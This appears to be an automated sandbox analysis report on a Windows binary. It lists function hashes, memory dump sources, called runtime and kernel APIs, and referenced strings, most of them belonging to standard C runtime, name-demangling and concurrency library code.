                                      • Opcode ID: c79aed02ba24220e7920bcc5e9149058131b2e6e47e5b67b50b7964d26267735
                                      • Instruction ID: d431a1a6466e475dbcfc646cfee9a592a23fb4e3919601af6b3302fa720e13f4
                                      • Opcode Fuzzy Hash: c79aed02ba24220e7920bcc5e9149058131b2e6e47e5b67b50b7964d26267735
                                      • Instruction Fuzzy Hash: 1B618F55C18FD846E6038B3D98422E6B3A0BFFA299F18D706FDB436132EB21B6C55350
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fcdcf1dd4996f771314b63a746aa1dff0e1eba8bc615e08403dda3c81b531f8c
                                      • Instruction ID: 8f3e84bb39ca09f34591e24c0e05305bd51cd5dccefcf87ee3d3eeb9efba9039
                                      • Opcode Fuzzy Hash: fcdcf1dd4996f771314b63a746aa1dff0e1eba8bc615e08403dda3c81b531f8c
                                      • Instruction Fuzzy Hash: B3514071D1C4A814EB1D417E48B22FDBEF29BC5202F0E81AAD9A3A66D9C53903469B50
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 429268e0d945208024015d5d37289875e398da387f10c2fe598760821bc4320b
                                      • Instruction ID: da16ce67a9ba66ef1b746e419301d7cd87d58011ccfadcf4d6227e432657d200
                                      • Opcode Fuzzy Hash: 429268e0d945208024015d5d37289875e398da387f10c2fe598760821bc4320b
                                      • Instruction Fuzzy Hash: D951E131E04B8A8BD711CF3CC6855AAB3A1BFF9348F198759D8846B197EB30B5C99740
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 27398a6bd04e7b042c2df0dd4eefd57469496f7df0cf8f294bdbd0d9e34c2454
                                      • Instruction ID: 9a3afa65e0348d92e76952c53a86dc02d37e0319edf3287e2fbb22d33ba5a2c8
                                      • Opcode Fuzzy Hash: 27398a6bd04e7b042c2df0dd4eefd57469496f7df0cf8f294bdbd0d9e34c2454
                                      • Instruction Fuzzy Hash: 344172327215168FD708CF39C895BA5F7E1FB98310F558769E42ACB2C2DB35E9148B84
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b109945f239d73b35f1c4d32d2d4060bfd6c877b6ed5f309652db362999435a1
                                      • Instruction ID: a3ea4e296a78cb1d5a8e28658a9c707362b67ac462ffb572b4b0977573ea40f3
                                      • Opcode Fuzzy Hash: b109945f239d73b35f1c4d32d2d4060bfd6c877b6ed5f309652db362999435a1
                                      • Instruction Fuzzy Hash: 3C512275A087018FC325CF28D491A5AB7F4FF9D304B548A2EE49AD7610E730FA45CB85
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ac79319d675a8eccf4d8ce1f47f29382643508449357e82df7b63a51a45e66a6
                                      • Instruction ID: 5c065bc10cb40a5044e55c5aeb6450d29700b50025c4f440f19bf35d5e49d60e
                                      • Opcode Fuzzy Hash: ac79319d675a8eccf4d8ce1f47f29382643508449357e82df7b63a51a45e66a6
                                      • Instruction Fuzzy Hash: C44172CAC39F9C06E513A73558821C1E190AFFB4DD224E387FC7475672E71275D52220
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                      • Instruction ID: 6476dc81b2dfc18aee8b455e40c0d88a2a7e8061b08ebeda6e7e7358389f28a4
                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                      • Instruction Fuzzy Hash: 9D110B77200042C3F618C62FD8B46BA979DEFD7327B2D4279DB454B658D122A54D9700
                                      APIs
                                      • DName::DName.LIBVCRUNTIME ref: 0095EB05
                                        • Part of subcall function 0095BA28: DName::doPchar.LIBVCRUNTIME ref: 0095BA4F
                                      • DName::operator+.LIBCMT ref: 0095EB14
                                        • Part of subcall function 0095BD6A: DName::operator+=.LIBVCRUNTIME ref: 0095BD80
                                      • DName::operator+=.LIBVCRUNTIME ref: 0095EE34
                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0095EE3D
                                      • DName::operator+.LIBCMT ref: 0095EE4B
                                      • DName::operator+=.LIBVCRUNTIME ref: 0095EE54
                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0095EE5D
                                      • DName::operator+.LIBCMT ref: 0095EE6B
                                      • DName::operator+=.LIBVCRUNTIME ref: 0095EE74
                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0095EE7D
                                      • DName::operator+.LIBCMT ref: 0095EE8B
                                      • DName::operator+=.LIBVCRUNTIME ref: 0095EE94
                                      • DName::operator+.LIBCMT ref: 0095EEAD
                                      • DName::operator+=.LIBVCRUNTIME ref: 0095EEB6
                                      • DName::operator+.LIBCMT ref: 0095EEC3
                                      • UnDecorator::getDataType.LIBVCRUNTIME ref: 0095EED2
                                        • Part of subcall function 0095DC26: DName::DName.LIBVCRUNTIME ref: 0095DC32
                                      • DName::operator+.LIBCMT ref: 0095EEFA
                                      • DName::operator+.LIBCMT ref: 0095EF4C
                                      • DName::operator+=.LIBCMT ref: 0095EEEA
                                        • Part of subcall function 0095BE33: DName::DName.LIBVCRUNTIME ref: 0095BE4D
                                      • DName::operator=.LIBVCRUNTIME ref: 0095EAF2
                                        • Part of subcall function 0095BC61: DName::doPchar.LIBVCRUNTIME ref: 0095BC80
                                      • DName::DName.LIBVCRUNTIME ref: 0095EB56
                                      • DName::operator+.LIBCMT ref: 0095EB62
                                      • DName::operator+=.LIBVCRUNTIME ref: 0095EB6E
                                      • DName::operator+=.LIBCMT ref: 0095EB84
                                      • DName::operator+=.LIBCMT ref: 0095EB8E
                                      • UnDecorator::getZName.LIBVCRUNTIME ref: 0095EBC7
                                      • DName::DName.LIBVCRUNTIME ref: 0095EBEF
                                      • DName::operator+.LIBCMT ref: 0095EBFE
                                      • DName::operator+=.LIBVCRUNTIME ref: 0095EC1E
                                      • DName::DName.LIBVCRUNTIME ref: 0095EC35
                                      • DName::DName.LIBVCRUNTIME ref: 0095ECAF
                                      • DName::DName.LIBVCRUNTIME ref: 0095ECD4
                                      • UnDecorator::getStringEncoding.LIBVCRUNTIME ref: 0095ED14
                                      • UnDecorator::getStringEncoding.LIBVCRUNTIME ref: 0095ED54
                                      • DName::operator=.LIBVCRUNTIME ref: 0095EDAF
                                      • DName::operator+.LIBCMT ref: 0095EDC7
                                      • DName::operator=.LIBVCRUNTIME ref: 0095EDF0
                                      • DName::operator=.LIBVCRUNTIME ref: 0095F0A0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Name::operator+Name::operator+=$Name$Name::$Decorator::get$Name::operator=$DimensionSigned$EncodingName::doPcharString$DataType
                                      • String ID: `anonymous namespace'$`string'$operator
                                      • API String ID: 2067090289-815891235
                                      • Opcode ID: 86af73f177adf3d85de26201848d66ce838f9bcb9419ca5cebb056411cd8640a
                                      • Instruction ID: d9b224cd890a72f37c53f596d652457bfa7eb064f160c91d19998626fd8b672c
                                      • Opcode Fuzzy Hash: 86af73f177adf3d85de26201848d66ce838f9bcb9419ca5cebb056411cd8640a
                                      • Instruction Fuzzy Hash: E1021B70804109DFCF18DFAAD8A1AFEBBB8EF49302F14045AF94297192DB759A4DCB50
                                      APIs
                                      • UnDecorator::getDecoratedName.LIBVCRUNTIME ref: 0096007C
                                        • Part of subcall function 0095DCEB: __EH_prolog3.LIBCMT ref: 0095DCF2
                                        • Part of subcall function 0095DCEB: UnDecorator::getDataType.LIBVCRUNTIME ref: 0095DD1F
                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0096008A
                                      • UnDecorator::getSignedDimension.LIBCMT ref: 00960096
                                      • DName::getString.LIBVCRUNTIME ref: 009600BD
                                      • DName::DName.LIBVCRUNTIME ref: 009600EB
                                      • DName::operator+.LIBCMT ref: 009600FB
                                      • DName::operator+.LIBCMT ref: 0096010A
                                      • DName::DName.LIBVCRUNTIME ref: 00960126
                                      • UnDecorator::getSignedDimension.LIBCMT ref: 00960155
                                      • DName::DName.LIBVCRUNTIME ref: 00960169
                                      • DName::DName.LIBVCRUNTIME ref: 00960178
                                      • UnDecorator::getDecoratedName.LIBVCRUNTIME ref: 00960190
                                      • DName::operator+=.LIBVCRUNTIME ref: 0096019A
                                      • DName::operator+=.LIBCMT ref: 009601A4
                                      • UnDecorator::getSignedDimension.LIBCMT ref: 009601C9
                                      • DName::operator+=.LIBVCRUNTIME ref: 009601D3
                                      • DName::operator+=.LIBCMT ref: 009601DD
                                      • UnDecorator::getSignedDimension.LIBCMT ref: 009601E9
                                      • DName::operator+=.LIBVCRUNTIME ref: 009601F3
                                      • DName::operator+=.LIBCMT ref: 009601FD
                                      • UnDecorator::getSignedDimension.LIBCMT ref: 00960209
                                      • DName::operator+=.LIBVCRUNTIME ref: 00960213
                                      • DName::operator+.LIBCMT ref: 0096021E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Decorator::get$Name::operator+=$DimensionNameSigned$Name::$Name::operator+$Decorated$DataH_prolog3Name::getStringType
                                      • String ID: .$.$NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-
                                      • API String ID: 3260400872-2556205067
                                      APIs
                                      • DName::DName.LIBVCRUNTIME ref: 0095E570
                                      • DName::operator+.LIBCMT ref: 0095E57F
                                      • UnDecorator::getScope.LIBVCRUNTIME ref: 0095E59E
                                      • DName::DName.LIBVCRUNTIME ref: 0095E5AB
                                      • DName::operator+.LIBCMT ref: 0095E5B7
                                      • DName::operator+.LIBCMT ref: 0095E5C7
                                      • DName::DName.LIBVCRUNTIME ref: 0095E5DB
                                      • DName::operator+.LIBCMT ref: 0095E5EA
                                      • UnDecorator::getThisType.LIBVCRUNTIME ref: 0095E633
                                      • DName::DName.LIBVCRUNTIME ref: 0095E66B
                                      • DName::operator+.LIBCMT ref: 0095E677
                                      • DName::operator+.LIBCMT ref: 0095E687
                                      • UnDecorator::getThisType.LIBVCRUNTIME ref: 0095E699
                                        • Part of subcall function 00960440: UnDecorator::getDataIndirectType.LIBVCRUNTIME ref: 00960466
                                      • DName::operator|=.LIBCMT ref: 0095E6A3
                                      • DName::DName.LIBVCRUNTIME ref: 0095E6AF
                                      • DName::operator+.LIBCMT ref: 0095E6BD
                                        • Part of subcall function 0095BD6A: DName::operator+=.LIBVCRUNTIME ref: 0095BD80
                                      • DName::operator+.LIBCMT ref: 0095E6F7
                                      • DName::DName.LIBVCRUNTIME ref: 0095E723
                                      • DName::operator+.LIBCMT ref: 0095E732
                                      • DName::operator+.LIBCMT ref: 0095E740
                                      • _HeapManager::getMemory.LIBVCRUNTIME ref: 0095E758
                                      • operator+.LIBVCRUNTIME ref: 0095E88C
                                      Similarity
                                      • API ID: Name::operator+$NameName::$Decorator::get$Type$This$DataHeapIndirectManager::getMemoryName::operator+=Name::operator|=Scopeoperator+
                                      • String ID:
                                      • API String ID: 1537886362-0
                                      APIs
                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(009D87E8,00000FA0,BA3649C5,?,?,?,?,0098F9B0,000000FF), ref: 00940E52
                                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,0098F9B0,000000FF), ref: 00940E5D
                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,0098F9B0,000000FF), ref: 00940E6E
                                      • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00940E84
                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00940E92
                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00940EA0
                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00940ECB
                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00940ED6
                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,0098F9B0,000000FF), ref: 00940EF9
                                      • ___scrt_fastfail.LIBCMT ref: 00940F0A
                                      • DeleteCriticalSection.KERNEL32(009D87E8,00000007,?,?,?,?,0098F9B0,000000FF), ref: 00940F15
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,0098F9B0,000000FF), ref: 00940F25
                                      Strings
                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00940E58
                                      • SleepConditionVariableCS, xrefs: 00940E8A
                                      • InitializeConditionVariable, xrefs: 00940E7E
                                      • WakeAllConditionVariable, xrefs: 00940E98
                                      • kernel32.dll, xrefs: 00940E69
                                      Similarity
                                      • API ID: AddressHandleProc$CriticalModuleSection__crt_fast_encode_pointer$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                      • API String ID: 2634751764-1714406822
                                      APIs
                                      • UnDecorator::getBasicDataType.LIBVCRUNTIME ref: 0095F113
                                      • DName::operator=.LIBVCRUNTIME ref: 0095F124
                                      • DName::operator+=.LIBCMT ref: 0095F132
                                      • UnDecorator::getPtrRefType.LIBCMT ref: 0095F164
                                      • operator+.LIBVCRUNTIME ref: 0095F185
                                      • UnDecorator::getDataIndirectType.LIBVCRUNTIME ref: 0095F1E2
                                      • UnDecorator::getBasicDataType.LIBVCRUNTIME ref: 0095F1EB
                                      • UnDecorator::getPtrRefDataType.LIBVCRUNTIME ref: 0095F203
                                      • UnDecorator::getScopedName.LIBVCRUNTIME ref: 0095F23F
                                      • operator+.LIBVCRUNTIME ref: 0095F260
                                      • DName::DName.LIBVCRUNTIME ref: 0095F272
                                      • DName::operator=.LIBVCRUNTIME ref: 0095F29D
                                      • DName::operator+=.LIBCMT ref: 0095F2AB
                                      Similarity
                                      • API ID: Decorator::get$Type$Data$BasicNameName::operator+=Name::operator=operator+$IndirectName::Scoped
                                      • String ID: std::nullptr_t$std::nullptr_t $volatile
                                      • API String ID: 2673590388-294867888
                                      APIs
                                      Similarity
                                      • API ID: _free$Info
                                      • String ID:
                                      • API String ID: 2509303402-0
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 0097E33C
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D6A8
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D6BA
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D6CC
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D6DE
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D6F0
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D702
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D714
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D726
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D738
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D74A
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D75C
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D76E
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D780
                                      • _free.LIBCMT ref: 0097E331
                                        • Part of subcall function 00975565: HeapFree.KERNEL32(00000000,00000000,?,0097DDF8,?,00000000,?,00000000,?,0097E09C,?,00000007,?,?,0097E490,?), ref: 0097557B
                                        • Part of subcall function 00975565: GetLastError.KERNEL32(?,?,0097DDF8,?,00000000,?,00000000,?,0097E09C,?,00000007,?,?,0097E490,?,?), ref: 0097558D
                                      • _free.LIBCMT ref: 0097E353
                                      • _free.LIBCMT ref: 0097E368
                                      • _free.LIBCMT ref: 0097E373
                                      • _free.LIBCMT ref: 0097E395
                                      • _free.LIBCMT ref: 0097E3A8
                                      • _free.LIBCMT ref: 0097E3B6
                                      • _free.LIBCMT ref: 0097E3C1
                                      • _free.LIBCMT ref: 0097E3F9
                                      • _free.LIBCMT ref: 0097E400
                                      • _free.LIBCMT ref: 0097E41D
                                      • _free.LIBCMT ref: 0097E435
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      APIs
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      APIs
                                      Similarity
                                      • API ID: Maklocchr$GetcvtMaklocstr$GetvalsH_prolog3_
                                      • String ID: false$true
                                      • API String ID: 2593140031-2658103896
                                      APIs
                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 0095AEE1
                                      • ___TypeMatch.LIBVCRUNTIME ref: 0095B013
                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 0095B0DD
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0095B13B
                                      • _UnwindNestedFrames.LIBCMT ref: 0095B15F
                                      • CallUnexpected.LIBVCRUNTIME ref: 0095B17A
                                      Similarity
                                      • API ID: ExceptionSpec$CallException@8FramesMatchNestedThrowTypeUnexpectedUnwind
                                      • String ID: csm$csm$csm
                                      • API String ID: 2291861386-393685449
                                      APIs
                                        • Part of subcall function 009112F0: ___std_type_info_name.LIBVCRUNTIME ref: 009113AE
                                        • Part of subcall function 009112F0: ___std_type_info_name.LIBVCRUNTIME ref: 00911419
                                      • ___std_type_info_name.LIBVCRUNTIME ref: 00912FD4
                                        • Part of subcall function 009583D9: ___unDName.LIBVCRUNTIME ref: 00958405
                                      • ___std_type_info_name.LIBVCRUNTIME ref: 0091303E
                                      Similarity
                                      • API ID: ___std_type_info_name$Name___un
                                      • String ID: ModPrime1PrivateExponent$ModPrime2PrivateExponent$MultiplicativeInverseOfPrime2ModPrime1$Prime1$Prime2$PrivateExponent$ThisObject:
                                      • API String ID: 3683324773-4091968653
                                      APIs
                                      • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 0094A86B
                                      • SwitchToThread.KERNEL32(?), ref: 0094A88E
                                      • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 0094A8AD
                                      • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 0094A8C9
                                      • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 0094A8D4
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0094A8FB
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0094A909
                                      Similarity
                                      • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextException@8InternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadThrowstd::invalid_argument::invalid_argument
                                      • String ID: count$ppVirtualProcessorRoots
                                      • API String ID: 3409498682-3650809737
                                      • Opcode ID: 11ddd3f780f120c9ce6f19924a76174860a9a208753f8b3c902f2037d8ef4f69
                                      • Instruction ID: 40e4e780342eda56f086fb7a50a45ea7b3e72524bc1ab68d45ea833e8d72895d
                                      • Opcode Fuzzy Hash: 11ddd3f780f120c9ce6f19924a76174860a9a208753f8b3c902f2037d8ef4f69
                                      • Instruction Fuzzy Hash: 88215174A40309AFCB14EFA9C595EAD77B8FF89354F4040A9E901AB351DB30AE45CF51
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: GetcvtMaklocchrMaklocstr$H_prolog3_
                                      • String ID: false$true
                                      • API String ID: 2216850052-2658103896
                                      • Opcode ID: fa3bc49533e357028b7aae8af40fc956923ea5d9563054dd95fa610eb319dbec
                                      • Instruction ID: 24203e937b7624fe3eac3e3fb72a701c054269a79604e23418abfc769450371a
                                      • Opcode Fuzzy Hash: fa3bc49533e357028b7aae8af40fc956923ea5d9563054dd95fa610eb319dbec
                                      • Instruction Fuzzy Hash: AC215CB5C00348AADF14EFA5D885AAFB7F8EF94700F00845AF8199F256EB70D944CB61
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 0094A2F1
                                      • GetCurrentProcess.KERNEL32 ref: 0094A2F9
                                      • DuplicateHandle.KERNEL32(00000000,000000FF,00000000,00000000,00000000,00000000,00000002), ref: 0094A30E
                                      • SafeRWList.LIBCONCRT ref: 0094A32E
                                        • Part of subcall function 0094832E: __EH_prolog3.LIBCMT ref: 00948335
                                        • Part of subcall function 0094832E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0094833F
                                        • Part of subcall function 0094832E: List.LIBCMT ref: 00948349
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0094A340
                                      • GetLastError.KERNEL32 ref: 0094A34F
                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0094A365
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0094A373
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8H_prolog3HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                      • String ID: eventObject
                                      • API String ID: 3870774015-1680012138
